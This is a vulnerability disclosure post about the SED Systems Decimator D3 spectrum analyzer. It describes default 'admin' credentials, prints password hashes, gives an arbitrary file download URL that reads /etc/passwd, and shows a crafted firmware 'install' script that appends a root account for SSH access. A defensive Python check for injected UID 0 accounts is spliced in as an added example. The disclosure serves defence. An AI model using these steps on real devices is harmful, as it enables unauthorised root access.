
Multiple Vulnerabilities in SED Systems’ Decimator D3

08/10/2015 | Author: Admin


During a recent penetration test, MDSec found several vulnerabilities in an RF spectrum analyzer that was exposed to the Internet. The SED Systems Decimator D3 is the third generation of SED’s popular Decimator spectrum analyzer, providing a frequency range of 5MHz to 3GHz and a very fast measurement refresh rate. More information on SED Systems Decimator D3 devices can be found on the vendor’s website.

Vulnerable devices can be identified by scanning for TCP port 9784, which offers a default remote API. When a client connects, the service announces itself with “connected”, as in the following output:

Connected to x.x.x.x.
Escape character is '^]'.
connected
status
status:3.1,3.0.12-1,0,0,41.0,Valid,Valid,540,-1.0,-1.0,5.1,11.4,-1.0
ping
ping:ok

The web service by default has a user interface for accessing the RF analyzer capability. Using the API, the device can also give raw remote access to I/Q samples which would provide a means to remotely sniff the RF spectrum. The Web Configuration Manager can be found under the “/cgi-bin/wcm.cgi” URI. Firmware for the device was downloaded and several vulnerabilities were found to be present within the device services.

Firstly, the device was shipped with hardcoded credentials, which had existed in the default firmware since at least February 2013. The following entries can be found in the “/etc/passwd” file:

root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly

The admin user has a default password of “admin”; the root user’s password is unknown at this time, and there is no documented way of changing either password trivially on the device. Using the “admin” user it was possible to obtain a web session to the Web Configuration Manager application and exploit a hidden arbitrary file download vulnerability discovered by reverse engineering the firmware:

http://x.x.x.x/cgi-bin/wcm.cgi?sessionid=009d45ecbabe015babe3300f&download=true&fullfilename=/etc/passwd

This allows any file to be downloaded from the device, because the “admin” user has root-equivalent privileges. To execute arbitrary code a third vulnerability was exploited, this time within the firmware flashing routine. By uploading a crafted tarball that contains an “install” script in its root, the device will accept the firmware and then attempt to execute “./install”. To prevent bricking or modification of the device, the flashing process can subsequently be cancelled. The vulnerability exists in the “/usr/bin/install_flash” command, which, after using “tar” to unpack an archive into a temporary folder of “/tmp/PID_of_tar”, does the following:

# If the archive contained its own install script then use that

if [ -x ./install ]; then
    ./install $all_args
    rc=$?
    exit $rc
fi

Using this vulnerability it is possible to upload a “.tar” file containing an “install” file that looks like the following to obtain a root user account with “adm1n/admin”:

cat install
#!/bin/sh
echo adm1n:\$1\$\$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh >> /etc/passwd

Using the newly created account it is now possible to SSH to the device remotely, as PermitRootLogin is enabled by default. The screenshot below shows successful exploitation of this weakness to obtain remote root privileges:
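A defender-side check for the persistence this technique leaves behind, added here as an example and not part of the original post or of the vendor’s firmware: it parses /etc/passwd content pulled from a device (the sample below is reconstructed inline from the entries quoted in this post) and flags root-equivalent accounts other than root, the known default “admin” hash, and empty password fields.

```python
from typing import Dict, List

# Hash of the default "admin" password quoted in the post; the empty salt
# ("$1$$") makes it easy to recognise on sight.
KNOWN_DEFAULT_HASHES = {
    "$1$$CoERg7ynjYLsj2j4glJ34.": "default D3 'admin' password",
}

# Constructed sample: the two shipped entries from the post plus the
# "adm1n" entry that the crafted install script appends.
SAMPLE_PASSWD = """\
root:$1$zfy/fmyt$khz2yIyTFDoCkhxWw7eX8.:0:0:root:/:/bin/sh
admin:$1$$CoERg7ynjYLsj2j4glJ34.:1000:0:root:/:/bin/webonly
adm1n:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/sh
"""


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split passwd lines into the seven standard fields; skip malformed lines."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw_hash, uid, gid, _gecos, home, shell = fields
        entries.append({"name": name, "hash": pw_hash, "uid": uid,
                        "gid": gid, "home": home, "shell": shell})
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return one finding per suspicious entry; an empty list means nothing was flagged."""
    findings = []
    for e in parse_passwd(text):
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"{e['name']}: extra UID 0 account with shell {e['shell']}")
        if e["hash"] in KNOWN_DEFAULT_HASHES:
            findings.append(f"{e['name']}: hash matches {KNOWN_DEFAULT_HASHES[e['hash']]}")
        if e["hash"] == "":
            findings.append(f"{e['name']}: empty password field")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```

Run it against a copy of /etc/passwd retrieved from the device during an investigation; on the sample it reports the default admin hash and the injected UID 0 “adm1n” account.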

[Screenshot: remote root shell obtained over SSH using the injected account]

MDSec have since provided details of these vulnerabilities to the manufacturer, who have updated and released a new firmware image intended to address these weaknesses. The new firmware patches have not been verified; however, it is advised that all users of SED Systems Decimator D3 devices update to the latest firmware version to prevent exploitation of these weaknesses by malicious parties.

This blog post was written by @hackerfantastic.
